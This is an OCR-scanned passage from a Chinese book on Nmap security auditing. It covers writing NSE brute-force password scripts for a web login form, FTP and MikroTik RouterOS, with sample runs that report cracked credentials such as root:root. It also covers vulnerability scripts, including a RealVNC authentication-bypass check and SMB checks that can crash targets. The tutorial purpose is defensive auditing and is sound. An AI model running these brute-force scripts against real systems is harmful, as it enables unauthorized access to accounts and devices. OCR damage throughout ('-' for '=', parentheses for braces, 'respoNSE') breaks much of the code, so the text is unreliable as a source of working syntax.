最 后 ，Driver:disconnect() 方法 用 来 实现 一 些 结尾 工作 ， 例 如 关闭 文件 处 理 指针 、 结 束 
socket 套 接 字 之 类 的 操作 。Driver:connect() 和 Driver:disconnect() 可 以 是 空 的 。 

下 面 给 出 了 用 于 声明 这 个 类 的 语法 。 


Driver = ( 
new - function(self, host, port, options) 








end, 

login = function(self) 

end 

connect - function(self) 
end 

disconnect - function(self) 
end 

) 


现在 给 出 这 个 类 的 一 个 实际 的 实现 过 程 。 在 这 个 函数 中 其 实 Driver:connect() 和 
Driver:disconnect() 并 没有 真 的 起 作用 ， 这 是 因为 这 个 脚本 调用 了 http 库 中 的 HTTP 方法 ， 而 
这 个 方法 并 没有 使 用 socket。 


Driver = ( 

new = function(self, host, port, options) 
local o = {} 
setmetatable(o, self) 
self. index - self 
o.options = options 
return o 

end, 

connect - function( self ) 
return true 

end, 


login = function( self, username, password ) 
-- Note the no cache directive 
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StdNSE.print debug(2, "HTTP POST $s$sWn", self.host, self.uri) 
local respoNSE - http.post( self.host, self.port, self.uri, ( no cache - true ], 


nil, ([self.options.uservar] - username, [self.options.passvar] - password ) ) 
-- This redirect is taking us to /wp-admin 
if respoNSE.status -- 302 then 


local c - creds.Credentials:new( SCRIPT NAME, self.host, self.port ) 
c:add(username, password, creds.State.VALID ) 

return true, brute.Account:new( username, password, "OPEN") 

end 

return false, brute.Error:new( "Incorrect password" ) 

end, 


disconnect - function( self ) 
return true 
end, 


check - function( self ) 

local respoNSE - http.get( self.host, self.port, self.uri ) 

StdNSE.print debug(1, "HTTP GET $s$s", stdNSE.get hostname (self.host),self.uri) 
-- Check if password field is there 

if ( respoNSE.status == 200 and respoNSE.body:match('type-[MV'"]password[V'"]')) then 
StdNSE.print debug(1, "Initial check passed. Launching brute force attack") 
return true 

else 

StdNSE.print debug(1, "Initial check failed. Password field wasn't found") 

end 


return false 
end 


) 


14.1.3. NSE 中 库 文 件 和 用 户 选项 的 传递 


brute 库 的 一 个 优势 就 在 于 它 的 灵活 性 。 它 支持 在 命令 行 中 输入 指定 选项 来 完成 配置 。 


例如 ， 通 过 brute.firstOnly 选项 ， 就 可 以 减少 进行 暴力 破解 的 时 间 。 如 果 指 定 这 个 参数 ，NSE 
在 找到 一 个 正确 的 用 户 名 和 密码 之 后 就 会 停止 。 这 个 库 中 可 定义 的 可 选项 如 下 。 





firstOnly 

口 passOnly 
口 max_retries 
Q delay 

O mode 

Q title 

O nostore 


O max guesses 
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O useraspass 

口 emptypass 

brute.firstOnly 参数 是 一 个 布尔 类 型 的 值 ， 设 置 了 这 个 参数 ， 在 执行 过 程 中 如 果 找 到 了 一 
个 有 效 的 用 户 密码 ，Engine 就 会 退出 。 设 置 实例 如 下 。 

Nmap --script brute --script-args brute.firstOnly «target» 

参数 brute.passOnly 设计 用 来 检测 用 户 名 为 空 的 情况 。 设 置 实例 如 下 。 

Nmap --script brute --script-args brute.passOnly «target» 

参数 brute.max_retries 设置 了 每 次 登录 时 最 大 的 网 络 连接 次 数 。 需 要 注意 的 是 ， 这 个 参 
数 在 命令 行 中 使 用 时 ， 名 字 略 有 不 同 。 

Nmap --script brute --script-args brute.retries=10 <target> 

参数 brute.delay 给 出 了 两 次 登录 操作 之 间 的 时 间 间 隔 。 设 置 实例 如 下 。 

Nmap --script brute --script-args brute.delay-3 «target» 

并 不 是 所 有 的 系统 都 会 一 直人 允许 暴力 破解 ， 很 多 系统 在 短 时 间 内 接 到 大 量 错误 的 登录 请 
求 之 后 ， 就 会 拒绝 接收 登录 请 求 。 参 数 brute.max_guesses 定义 了 每 个 账户 尝试 登录 的 次 数 。 
同样 在 命令 行 中 这 个 参数 的 名 字 和 brute.max_guesses 略 有 不 同 。 

Nmap --script brute --script-args brute.guesses-10 «target» 

默认 情况 下 brute 库 文件 会 在 尝试 登录 时 将 用 户 名 也 作为 一 个 密码 来 操作 ， 可 以 通过 命 
令 行 来 修改 这 个 设置 。 

Nmap --script brute --script-args brute.useraspass-false «target» 

参数 brute.emptypass 指定 可 以 使 用 空 作 为 密码 。 这 个 参数 的 值 也 可 以 在 命令 行 中 设 定 。 

Nmap --script brute --script-args brute.emptypass «target» 

如 果 在 程序 中 设 定 这 些 参 数 的 值 ， 需 要 在 Driver 类 初始 化 的 时 候 就 指定 。 

mE 

new - function(self, host, port, options ) 

local o - ( host - host, port - port, options - options ) 

setmetatable(o, self) 


self. index = self 
o.emptypass = true 





return o 
end, 
Mg 


14.1.4. NSE 中 通过 Account 对 象 返回 有 效 的 账户 
Account 类 用 来 保存 在 执行 过 程 中 使 用 过 的 账户 和 密码 。 每 一 个 保存 在 这 个 类 中 的 凭证 
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都 有 一 个 状态 。 这 些 状 态 包括 如 下 三 个 。 


返 


Q OPEN 

DO DISABLED 

Q LOCKED 

在 实现 Driver 类 的 时 候 可 以 看 到 这 个 类 ， 这 个 类 的 实例 会 出 现在 Driver:login() 函数 的 
回 值 中 。 为 了 创建 这 个 实例 ， 可 以 简单 地 使 用 username、password 和 account state 这 三 个 





参数 来 初始 化 这 个 实例 。 


brute.Account:new (username, password, "OPEN") 


在 脚本 中 ， 为 所 有 的 账户 设置 正确 的 状态 十 分 重要 。 一 般 而 言 ， 需 要 在 Driver:login() X 


现 中 完成 以 下 内 容 。 


if string.find(data, "Welcome home") ~= nil then 

return true, brute.Account:new(username, password, "OPEN") 

elseif string.find(data, "Too many attempts. This account has been locked") -- nil then 
return true, brute.Account:new(username, password, "LOCKED") 

end 


14.1.5 NSE 中 使 用 Error 类 来 处 理 异常 


Error 类 用 来 专门 处 理 程序 执行 中 的 异常 。 这 个 类 可 以 管理 每 次 登录 的 尝试 ， 在 开发 


NSE 脚本 时 使 用 这 个 类 是 一 个 良好 的 习惯 。 


为 了 创建 brute.Error 的 实例 ， 需 要 使 用 这 个 类 的 构造 函数 。 
brute.Error:new("Your own message error goes here") 


这 个 类 的 实例 将 会 作为 Driver 实现 中 的 第 二 个 返回 值 。 


if login then 

return true, brute.Account:new(username, password, "OPEN") 
else 

return false, brute.Error:new("Incorrect password") 

end 


14.2. 使 用 unpwdb NSE 库 读 取 用 户 各 和 密码 信息 


unpwdb 库 文 件 中 包含 了 两 个 函数 ， 即 usernames) 和 passwords()。 下 面 的 代码 部 分 给 出 


了 如 何 使 用 这 些 函 数 与 用 户 名 和 密码 数据 库 进行 互动 。 


local usernames, passwords 

local Nmap try - Nmap.new try() 
usernames = Nmap try (unpwdb. usernames ()) 
passwords = Nmap try (unpwdb.passwords()) 
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for password in passwords do 
for username in usernames do 

-- Do something! 

end 

usernames ("reset") --Rewind list 
end 


14.4 ”对 扫描 中 得 到 的 用 户 凭证 进行 管理 


Nmap 6.0 以 前 的 版 本 中 ， 由 NSE 扫描 得 到 的 用 户 名 和 密码 都 会 保存 在 Nmap 注册 表 
(registry) 中 。Creds 库 的 作用 就 是 提供 一 个 用 来 完成 对 registry 中 的 用 户 凭证 进行 读 取 和 写 
入 操作 的 接口 。 和 brute.Account 相 类 似 ， 这 里 的 每 一 个 凭证 都 关联 着 一 个 状态 ， 因 此 支持 类 
型 过 滤 。 在 一 个 NSE 脚本 中 ， 可 以 使 用 函数 列 出 所 有 的 账户 。 

tostring(creds.Credentials:new(SCRIPT NAME, host, port)) 

也 可 以 根据 类 型 执行 特定 的 操作 。 


local c = creds.Credentials:new(creds.ALL DATA, host, port) 
for cred in c:getCredentials (creds.State.VALID) do 
doSomething(cred.user, cred.pass) 

end 


还 可 以 简单 地 将 这 些 内 容 写 人 一 个 文件 中 。 


local c = creds.Credentials:new( SCRIPT NAME, host, port ) 
Status, err - c:saveToFile("credentials-dumpfile-csv","csv") 


新 的 登录 凭证 可 以 写 人 或 者 与 特定 的 服务 进行 关联 。 例 如 ， 要 将 登录 凭证 和 HTTP 服务 
联系 到 一 起 。 可 以 使 用 如 下 这 个 语句 。 

Nmap -p- --script brute --script-args creds.http="cisco:cisco" «target» 

可 以 使 用 global 关键 字 作 为 参数 来 将 它们 添加 到 全 局 中 。 

Nmap -p- --script brute --script-args creds.global-"administrator:administrator" «target» 


最 后 ， 提 交 一 个 新 的 登录 凭证 到 注册 表 中 ， 例 如 : 


local c = creds.Credentials:new(SCRIPT NAME, self.host, self.port ) 
c:add (username, password, creds.State.VALID ) 


14.4 针对 FTP 的 密码 审计 脚本 


在 本 节 中 将 编写 一 个 完整 的 暴力 破解 FTP 密码 的 脚本 ， 具 体 步 又 如 下 。 
步骤 1: 导入 所 需 的 库 文件 ， 然 后 给 出 脚本 的 信息 。 


local brute = require "brute" 
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local creds = require "creds" 

local Nmap - require "Nmap" 

local shortport = require "shortport" 
local stdNSE - require "stdNSE" 
local string - require "string" 


description = [[ 
Performs brute force password auditing against FTPservers. 


Based on old ftp-brute.NSE script by DimanTodorov, Vlatko Kosturjak and Ron Bowes.]] 
author - "Aleksandar Nikolic" 

liceNSE - "Same as Nmap--Seehttps://Nmap.org/book/man-legal.html" 

categories - ("intrusive","brute") 


步骤 2 : 这 个 脚本 将 会 在 检测 到 目标 主机 的 21 端口 开放 ， 或 者 提供 FTP 服务 以 后 开始 
， 这 里 使 用 shortport.port or service() 来 定义 这 个 portrule。 
portrule = shortport.port or service(21,"ftp") 


步骤 3: 接 下 来 定义 一 个 socket. 上 的 响应 时 间 。 


local arg timeout -stdNSE.parse timespec(stdNSE.get script args 
(SCRIPT NAME ..".timeout")) 
arg timeout = (arg timeout or 5) * 1000 


步骤 4: 开始 实现 Driver 类 。 


Driver = ( 

new -function(self, host, port) 
local o- () 

setmetatable(o, self) 

self. index = self 

o.host -host 

o.port -port 

return o 

end, 


步骤 5: 这 里 的 Driver:connect() 函数 应 该 建立 一 个 我 们 所 需要 的 连接 。 


connect -function( self ) 
self.socket = Nmap.new socket () 
localstatus, err - self.socket:connect(self.host, self.port) 
self.socket:set timeout(arg timeout) 
if(not(status)) then 
returnfalse, brute.Error:new( "Couldn't connect to host: " .. err ) 
end 
returntrue 
end, 


步骤 6: 接 下 来 进入 整个 脚本 最 为 重要 的 Driver:login 函数 部 分 ， 在 这 里 首先 创建 一 个 连 





接 和 一 个 异常 处 理 。 


login -function (self, user, pass) 
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localstatus, err 


localres - "" 
步骤 7: 向 目标 主机 使 用 send 发 送 用 户 名 。 
status,err = self.socket:send("USER " .. user .. "\r\n") 
if(not(status)) then 
returnfalse, brute.Error:new("Couldn't send login: " .. err) 
end 
步骤 8: 向 目标 主机 使 用 send 发 送 密码 。 
status,err = self.socket:send("PASS " .. pass .. "\r\n") 
if(not(status)) then 
returnfalse, brute.Error:new("Couldn't send login: " .. err) 
end 


步骤 9: 创建 一 个 缓冲 区 ， 然 后 取得 返回 数据 的 第 一 行 。 


Localbuffer = stdNSE.make buffer(self.socket, "\r?\n") 
Localline = buffer() 


步骤 10: 接 下 来 对 返回 数据 的 内 容 进行 比较 ， 然 后 找到 放 回 值 中 包括 “230” 的 数据 。 


while (line)do 
stdNSE .debugl ("Received: $s", line) 


if (string.match (line, "^230")) then 
stdNSE.debugl ("Successful login: $s/$s", user, pass) 
?return true, creds.Account:new( user, pass, creds.State.VALID) 


elseif(string.match(line, "^530")) then 


return false,??brute.Error:new("Incorrect password" ) 


elseif(string.match(line, "^220")) then 
elseif(string.match(line, "^331")) then 


如 果 返 回 值 不 包括 以 上 所 有 的 值 (230、530、220、331 ) 的 话 ， 这 里 需要 产生 一 个 





or 的 实例 。 


brute.Err 


else 
StdNSE.debugl("WARNING: Unhandled respoNSE: %s", line) 
local err = brute.Error:new ("Unhandled respoNSE") 


err 


:SetRetry (true) 


return false, err 


end 


line -buffer() 


end 


returnfalse, brute.Error:new("Login didn't return a proper respoNSE") 


end 


这 上 
dis 
sel 





, 


有 需要 定义 一 个 Driver:disconnect() 来 正确 关闭 socket. 


connect= function( self ) 
f.socket:close() 
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returntrue 
end 


) 


步骤 11 : 还 需要 创建 一 个 brute.Engine 的 实例 ， 在 action 部 分 来 完成 对 这 个 brute. 
Engine 的 初始 化 。 


action = function( host, port ) 


localstatus, result 
localengine - brute.Engine:new(Driver, host, port) 
engine.options.script name - SCRIPT NAME 

status, result- engine:start() 

returnresult 
end 


到 此 已 经 完成 了 对 整个 FTP 密码 暴力 破解 的 编写 工作 ， 这 段 代 码 执行 起 来 的 效果 如 图 
14-1 所 示 。 
rE 
| fig) IAT NEC) AMH) 
|| 目标 。 101163944 加 | ES t s) 取消 


] 





命令 :Nmap -p 21 -script ftp-brute 10.16.3944 


CLERI ome) we menn sme n 


ERESI Nmap -p 21 --script ftp-brute 10.16.39.44 z| 3 [s 


bogon (10.16.39.44) 
Starting Nmap 7.30 ( https://nmap.org ) at 2016-11-17 10:13 ?D1útēx?ē2?? 
bogon (192168153130) | Nmap scan report for bogon (10.16.39.44) 


Host is up (0.005 latency). 
bogon (192.168.153.131) | poat "srt SERVICE | 

















bogon (192.168.153.132) | 21/tcp open ftp | 
NN bogon (192.168.153.133) Account: 
root:root - Valid credentials 
slxtstcedu.cn (211.81.201 Statistics: Performed 45009 guesses in 129 seconds, average tps: 344.4 





| Neap done: 1 IP address (1 host up) scanned in 132.12 seconds 






































14-1 ftp-brute 的 执行 过 程 


14.5 ”针对 MikroTik RouterOS API 的 密码 审计 脚本 


好 了 ， 现 在 万 事 俱 备 只 欠 东 风 。 接 下 来 将 所 有 的 这 些 内 容 连 接 到 一 起 ， 完 成 一 个 完整 的 
脚本 。 这 一 次 的 目标 是 一 台 运 行 着 MikroTik RouterOS 3.x 系统 的 设备 。 
这 个 API 服务 运行 在 TCP 的 8728 端口 上 ， 并 且 人 允许 通过 这 个 端口 获得 该 设备 的 完全 管 
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理 权限 。 通 常 ， 管 理 员 会 锁定 HTTP 和 SSH， 但 不 会 锁定 API。 现 在 编写 一 个 脚本 来 完成 对 
这 个 服务 的 密码 审计 ， 具 体 步 骤 如 下 。 
步骤 1: 先导 和 人 需要 的 库 文件 ， 并 编写 信息 标签 。 


description = [[ 

Performs brute force password auditing against Mikrotik RouterOS devices with 
the API 

RouterOS interface enabled. 

Additional information: 

* http://wiki.mikrotik.com/wiki/API 

* http://wiki.mikrotik.com/wiki/API in C 

* https://github.com/mkbrutusproject/MKBRUTUS 

11 


author = "Paulino Calderon «calderon()websec.mx»" 
liceNSE - "Same as Nmap--See http://Nmap.org/book/man-legal.html" 
categories - ("discovery", "brute") 


local shortport = require "shortport" 

local comm = require "comm" 

local brute - require "brute" 

local creds - require "creds" 

local stdNSE - require "stdNSE" 

local openssl - stdNSE.silent require "openssl" 


步骤 2 : 当 目标 系统 的 TCP 8727 端口 开放 的 时 候 ， 该 脚本 开始 执行 。 不 过 ， 此 时 Nmap 
还 不 能 正确 检测 出 这 个 服务 。 使 用 shortport.portnumber() 来 定义 一 个 port 规则 。 


portrule = shortport.portnumber(8728, "tcp") 

步骤 3 : 接 下 来 实现 Driver 类 。 这 个 设备 默认 的 管理 账户 是 aamin， 密 码 为 空 。 因 此 在 
定义 这 个 Driver 的 时 候 ， 要 开启 空 密码 选项 。 

Driver = 

{ 

new = function(self, host, port, options ) 

local o = ( host = host, port = port, options = options } 

setmetatable(o, self) 

self. index = self 

o.emptypass - true 

return o 


end 


) 


步骤 4 : Driver:connect() 函数 用 来 建立 需要 的 socket 连接 ， 需 要 注意 如 何 接收 options 
table 中 的 timeout 值 。 








connect = function( self ) 

self.s = Nmap.new socket ("tcp") 

self.s:set timeout (self.options['timeout']) 

return self.s:connect(self.host, self.port, "tcp") 
end 
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步骤 5: 现在 定义 一 个 函数 Driver:disconnect() 来 关闭 这 个 连接 。 


disconnect = function( self ) 
return self.s:close() 
end 


HRO: 接 下 来 完成 这 个 脚本 的 核心 部 分 一 一 函数 Driver:login()。 这 里 构造 一 个 用 来 登 
录 API 协议 的 登录 查询 。 下 面 将 这 个 代码 分 成 几 个 部 分 来 介绍 。 
首先 ， 利 用 函数 bin.pack0 来 创建 所 需要 的 连接 探 针 。 


login = function( self, username, password ) 
local status, data, try 

data = bin.pack("cAx", 0x6,"/login") 

try = Nmap.new try(function() return false end) 


其 次 ， 向 目标 发 送 这 个 探 针 ， 试 图 获得 目标 发 回 的 响应 。 


try(self.s:send(data)) 

data - try(self.s:receive bytes(50)) 

StdNSE.debug(1, "RespoNSE #1:%s", data) 

local , _, ret = string.find(data, '!done$$-ret-(.*)') 


如 果 回 应 正常 ， 可 以 构造 一 个 登录 查询 字符 串 。 


if ret then 

stdNSE.debug(1, "Challenge value found:$s", ret) 

local md5str - bin.pack("xAA", password, ret) 

local chksum = stdNSE.tohex(openssl.md5 (md5str)) 

local login pkt = bin.pack("cAcAcAx", 0x6, "/login", 0x0b, 
"-name-"..username,0x2c, "-respoNSE-00"..chksum) 


发 送 这 个 登录 查询 ， 然 后 等 待 回 应 。 


try(self.s:send(login pkt)) 
data - try(self.s:receive bytes(50)) 
StdNSE.debug(1, "RespoNSE #2:%s", data) 


如 果 一 个 用 户 名 和 密码 的 组 合 是 可 用 的 ， 将 这 个 用 户 名 和 密码 组 合 添加 到 registry 中 ， 
然后 向 Engine 返回 这 个 结果 。 


if data and string.find(data, "$!done") ~= nil then 

if string.find(data, "message-cannot") -- nil then 

local c - creds.Credentials:new(SCRIPT NAME, self.host, self.port ) 
c:add(username, password, creds.State.VALID ) 

return true, brute.Account:new(username, password, creds.State.VALID) 
end 





end 


如 果 登 录 的 尝试 不 成 功 ， 就 返回 一 个 brute.Error 的 实例 。 
return false, brute.Error:new( "Incorrect password" ) 


这 个 Driver 类 看 起 来 如 下 所 示 。 
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Driver - 

t 

new = function(self, host, port, options ) 

local o - ( host - host, port - port, options - options ) 
setmetatable(o, self) 

self. index = self 

o.emptypass - true 

return o 

end, 

connect - function( self ) 

self.s = Nmap.new socket ("tcp") 

self.s:set timeout (self.options['timeout']) 

return self.s:connect(self.host, self.port, "tcp") 

end, 

login = function( self, username, password ) 

local status, data, try 

data = bin.pack("cAx", 0x6,"/login") 

--Connect to service and obtain the challenge respoNSE 
try - Nmap.new try(function() return false end) 
try(self.s:send(data)) 

data = try(self.s:receive bytes(50)) 

stdNSE.debug(1, "RespoNSE #1:%s", data) 

local , _, ret = string.find(data, '!done$$-ret-(.*)') 
--If we find the challenge value we continue the connection process 
if ret then 

stdNSE.debug(1, "Challenge value found:$s", ret) 

local md5str = bin.pack("xAA", password, ret) 

local chksum - stdNSE.tohex(openssl.md5 (md5str)) 

local login pkt = bin.pack("cACAcAx", 0x6, "/login", OxO0b, 
"-name-"..username,0x2c, "-respoNSE-00"..chksum) 
try(self.s:send(login pkt)) 

data = try(self.s:receive bytes(50)) 

StdNSE.debug(1, "RespoNSE #2:%s", data) 

if data and string.find(data, "$!done") ~= nil then 

if string.find(data, "message-cannot") -- nil then 

local c - creds.Credentials:new(SCRIPT NAME, self.host, self.port ) 
Cc:add(username, password, creds.State.VALID ) 

return true, brute.Account:new(username, password, creds.State.VALID) 
end 

end 

end 

return false, brute.Error:new( "Incorrect password" ) 
end, 

disconnect - function( self ) 

return self.s:close() 

end 


) 


步骤 7 : 需要 做 的 是 创建 一 个 实例 brute.Engine。 主 要 执行 代码 将 会 实现 brute.Engine 类 
的 实例 化 ， 然 后 接收 一 些 配 置 的 参数 ， 例 如 线程 和 连接 timeout。 


212 Ð 诸 神 之 眼 一 Nmap 网 络 安全 审计 技术 揭秘 


action = function(host, port) 

local result 

local thread num - stdNSE.get script args(SCRIPT NAME..".threads") or 3 
local options - (timeout - 5000) 

local bengine - brute.Engine:new(Driver, host, port, options) 
bengine:setMaxThreads (thread num) 

bengine.options.script name = SCRIPT NAME 

., result = bengine:start() 

return result 


end 
至 此 完整 的 版 本 已 经 完成 ， 可 以 使 用 它 去 测试 目标 。 得 到 的 结果 如 下 所 示 。 
PORT STATE SERVICE 
8728/tcp open unknown 
| mikrotik-routeros-brute: 
| Accounts 
admin - Valid credentials 
Statistics 


| 
| 
UN Performed 500 guesses in 70 seconds, average tps: 7 


好 了 ， 仅 仅 写 了 不 到 100 行 代码 就 完成 了 对 指定 目标 的 密码 审计 ， 感 觉 如 何 ? 完整 
的 mikrotik-routeros-brute 脚本 可 以 在 https://github.com/cldrn/Nmap-NSE-scripts/blob/master/ 
scripts/6.x/mikrotik-routeros-brute.NSE 中 找到 。 


小 结 


本 章 介绍 了 密码 审计 脚本 的 开发 ， 并 针对 实际 应 用 开发 了 多 个 密码 审计 的 脚本 ， 事 实 
上 ， 在 很 多 地 方 都 可 以 自己 开发 这 种 脚本 。 
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漏洞 审计 与 渗透 脚本 的 编写 


在 本 章 中 的 目标 是 利用 NSE 中 功能 强大 的 库 文件 来 开发 针对 各 种 应 用 、 服 务 和 网 络 协 
议 漏洞 的 脚本 。 利 用 NSE 来 开发 这 类 脚本 的 最 大 好 处 就 是 可 以 节省 开发 者 的 大 量 时 间 和 精 
力 ， 在 后 面 介绍 的 实例 中 ， 可 以 很 明显 地 感受 到 这 一 点 。 

目前 NSE 的 漏洞 分 类 中 包含 的 脚本 数量 还 不 到 100 个 ,但 是 这 类 脚本 却 是 很 多 网 络 渗 
透 者 和 维护 者 的 最 爱 。 利 用 这 些 脚 本 可 以 轻松 找到 那些 没有 及 时 更 新 补丁 的 系统 ， 或 者 存在 
漏洞 的 服务 和 应 用 程序 。 

在 这 一 章 中 ， 针 对 下 面 的 几 个 例子 来 讲解 关于 漏洞 的 脚本 编写 过 程 。 

O RealVNC 服务 器 的 认证 绕 过 漏洞 。 

口 经 典 的 Windows SMB 漏洞 。 

口 OpenSSL 的 Heartbleed 漏洞 。 

口 Web 应 用 中 常见 的 Shellshock 漏洞 。 

O IPMIBMC 上 的 配置 文件 泄漏 漏洞 。 

另外 ,将 在 本 章 中 学 习 vulns 库 文件 的 使 用 方法 ， 通 过 这 个 文件 可 以 准确 报告 漏洞 的 信 
Eo WT, FERIHA NSE 漏洞 脚本 的 编写 之 旅 。 





15.1 Nmap 中 的 漏洞 扫描 功能 
平时 可 能 会 用 到 一 些 专业 的 漏洞 扫描 器 ， 例 如 Nessus 或 者 OpenVas 等 。 其 实在 NSE 脚 


e 
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本 的 帮助 下 ，Nmap 也 可 以 成 为 一 款 神 奇 的 漏洞 扫描 工具 。 这 些 漏 洞 扫描 的 脚本 都 位 于 vulns 
分 类 下 面 。 

使 用 NSE 来 完成 漏洞 扫描 的 优势 包括 以 下 几 点 。 

口 可 以 使 用 Nmap API 来 完成 对 扫描 过 程 中 收集 信息 的 处 理 。 

Q NSE 脚本 可 以 在 执行 过 程 中 和 其 他 的 脚本 共享 获得 的 信息 。 

Q NSE 中 提供 了 大 量 网 络 协议 库 的 组 件 。 

O NSE 中 提供 了 漏洞 库 文件 ， 利 用 漏洞 库 文件 可 以 创建 一 份 优秀 的 漏洞 报告 

Q NSE 中 提供 了 强大 的 并 发 机 制 和 错误 处 理 机 制 。 

前 面 曾经 介绍 过 ， 如 果 和 希望 对 目标 执行 整个 分 类 下 面 的 所 有 脚本 ， 那 么 可 以 在 选 
项 --script 后 面 加 上 分 类 的 名 字 。 同 样 ， 也 可 以 用 相似 的 办 法 来 提高 目标 版 本 的 检测 功能 ， 
以 及 将 目标 端口 设置 为 全 部 有 效 端口 。 

Nmap -sV --version-all -p- --script vuln «target» 

在 上 面 命令 中 ,将 -sV --version-all 作为 选项 来 提高 版 本 检测 的 效率 ， 并 使 用 -p- 将 目标 
端口 指定 为 全 部 有 效 端口 。 

在 使 用 一 些 漏洞 检测 脚本 时 ， 还 会 得 到 一 些 关 于 漏洞 的 相关 报告 ， 如 图 15-1 所 示 。 
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图 15-1 Nmap 对 目标 进行 漏洞 扫描 的 相关 报告 
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另外 ， 在 对 目标 进行 扫描 的 时 候 ， 如 果 想 得 到 详细 信息 ， 也 可 以 使 用 参数 vulns.showall 
把 全 部 的 内 容 都 显示 出 来 。 
Nmap -sV --script vuln --script-args vulns.showall <target> 


图 15-2 中 给 出 了 扫描 的 结果 。 
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图 15-2 显示 详细 信息 的 Nmap 漏洞 扫描 结果 


15.2. NSE 中 的 exploit 脚本 


NSE 的 exploit 分 类 包含 32 个 脚本 ,这 些 脚 本 都 是 用 来 对 某 些 应 用 和 服务 进行 渗透 的 ， 
从 这 些 脚本 的 名 字 上 一 般 就 可 以 看 出 它们 攻击 的 目标 ， 下 面 列举 几 个 。 
口 http-csrf: 专门 用 来 检测 目标 网 站 是 否 存 在 跨 站 点 请 求 伪造 (csrf) 漏洞 。 
口 http-stored-xss: 专门 用 来 检测 目标 网 站 是 否 存 在 存储 型 跨 站 (xss) 漏洞 。 
O http-adobe-coldfusion-apsal301 : 专门 用 来 检测 目标 网 站 是 否 存在 adobe-coldfusion- 
apsal301 漏洞 。 
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口 smb-check-vulns : 专门 用 来 检测 目标 为 Windows 操作 系统 上 的 一 个 ms08_067 漏洞 ， 
这 个 漏洞 曾经 广泛 存在 于 Windows XP 和 Windows 2003 中 。 

在 获得 目标 的 一 些 有 用 信息 之 后 ， 例 如 目标 服务 器 的 类 型 为 HS， 可 以 在 整个 脚本 中 查找 相 
关 的 漏洞 。 针 对 这 个 IS， 可 以 查找 到 一 个 iis-short-name-brute ( IIS 短文 件 名 暴力 枚 举 ) 漏洞 渗透 
脚本 ， 这 个 脚本 的 名 字 为 http-iis-short-name-brute.NSE。 这 是 一 个 微软 IIS 漏洞 ， 攻 击 者 可 以 利用 
一 个 包含 “~” 的 get 请 求 ， 从 而 导致 目标 服务 器 上 的 文件 和 文件 夹 泄漏 。 

受到 影响 的 服务 器 软件 版 本 有 如 下 这 些 。 

O IIS 1.0, Windows NT 3.51 

DIS 2.0, Windows NT 4.0 

DIS 3.0, Windows NT 4.0 Service Pack 2 

Q IIS 4.0, Windows NT 4.0 Option Pack 

Q IIS 5.0, Windows 2000 

Q IIS 5.1, Windows XP Professional fll Windows XP Media Center Edition 

Q IIS 6.0, Windows Server 2003 和 Windows XP Professional x64 Edition 

O IIS 7.0, Windows Server 2008 fll Windows Vista 

Q IIS 7.5, Windows 7 (远程 开启 了 错误 或 者 没有 web.config 配置 文件 的 情况 下 ) 

Q IIS 7.5, Windows 2008 (经 典 托管 管道 模式 ) 

执行 这 个 脚本 的 命令 格式 如 下 。 

Nmap -p80 --script http-iis-short-name-brute <target> 


这 个 脚本 执行 的 结果 如 图 15-3 所 示 。 














ken a 
bogor (192198 153130) 
bogon (192268153155) 
bogen (192268153133 








图 15-3 对 目标 执行 http-iis-short-name-brute 脚本 的 结果 
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exploit 分 类 中 全 部 的 NSE 脚本 都 可 以 在 下 面 的 地 址 中 找到 : 


http://Nmap.org/NSEdoc/categories/exploit.html. 


153 RealVNC 的 渗透 脚本 


VNC 是 一 种 被 广泛 使 用 的 远程 控制 协议 ， 而 RealVNC 则 是 由 VNC 协议 的 开发 者 编写 
的 一 款 小 巧 的 远程 控制 软件 。 目 前 这 款 软 件 RealVNC 受到 了 大 量 用 户 的 欢迎 。RealVNC 软 
件 分 为 服务 器 端 和 客户 端 两 部 分 。 但 是 在 这 款 软件 的 很 多 过 时 版 本 中 都 存在 着 一 些 漏洞 ， 尤 
其 是 realvnc-auth-bypass (RealVNC 认证 绕 过 ) 漏洞 ， 可 能 导致 攻击 者 直接 绕 过 认证 机 制 ， 从 
而 获得 安装 有 RealVNC 的 计算 机 的 控制 权限 。 

接 下 来 编写 这 个 脚本 。 

首先 完成 脚本 的 描述 、 作 者 、 分 类 等 信息 。 


description = [[ 


Checks if a VNC server is vulnerable to the RealVNC authentication 
bypass (CVE-2006-2369). 
11 


author - "Brandon Enright" 

liceNSE - "Same as Nmap--See http://Nmap.org/book/man-legal.html" 
categories - ("auth", "default", "safe") 

导入 所 需要 的 库 文件 。 


local Nmap = require "Nmap" 
local shortport - require "shortport" 
local vulns = require "vulns" 


这 个 脚本 的 执行 规则 是 发 现 端口 为 5900、 服 务 为 VNC 的 目标 后 执行 。 

portrule = shortport.port or service(5900, "vnc") 

接 下 来 介绍 action 函数 部 分 。 

首先 创建 一 个 socket 函数 ， 与 目标 服务 进行 通信 ， 然 后 向 目标 发 送 探 针 数据 包 ， 根 据 返 
回 的 回应 包 来 检测 目标 上 运行 的 RealVNC 是 否 存在 漏洞 。 


action = function(host, port) 
local socket = Nmap.new socket () 
local result 

local status - true 





Socket:connect(host, port) 


Status, result = socket:receive lines (1) 
if (not status) then 
socket:close() 
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return 
end 


Socket:send("RFB 003.008Xn") 

status, result = socket:receive bytes(2 

if (not status or result ~= "\001\002") then 
socket:close() 

return 

end 

Socket:send ("N001") 

status, result - socket:receive bytes(4 

if (not status or result ~= "N000N000N000N000") then 
Socket:close() 

return 

end 

Socket:close() 

return "Vulnerable" 


end 

如 果 目 标 上 的 RealVNC 存在 漏洞 的 话 ， 将 会 返回 如 下 结果 。 

PORT STATE SERVICE VERSION 
5900/tcp open vnc VNC (protocol 3.8) 


| realvnc-auth-bypass: Vulnerable 


154 Windows 系统 漏洞 的 检测 


坏 ， 


与 之 前 的 普通 脚本 不 同 ， 一 些 用 来 检测 系统 漏洞 的 脚本 在 执行 时 会 对 目标 系统 造成 破 
因此 在 使 用 时 必须 谨慎 。Nmap 中 对 这 些 脚 本 也 做 了 限制 。 在 进行 整体 扫描 的 时 候 ， 如 





果 想 要 执行 这 些 脚本 ， 则 需要 使 用 参数 --script-args unsafe. 


Nmap -p- -sV --script vuln --script-args unsafe «target» 
例如 ， 对 目标 192.168.153.133 进行 一 次 无 限制 扫描 ， 执 行 的 结果 如 图 15-4 所 示 。 
在 扫描 的 时 候 ， 这 种 脚本 可 能 会 引起 目标 系统 的 崩溃 。 最 常 使 用 的 脚本 smb-check-vulns 


就 完成 了 对 目标 系统 中 是 否 包含 以 下 漏洞 的 检测 。 


口 Windows Ras RPC service vulnerability (MS06-025) 

O Windows Dns Server RPC service vulnerability (MS07-029) 

Q Windows RPC vulnerability (MS08-67) 
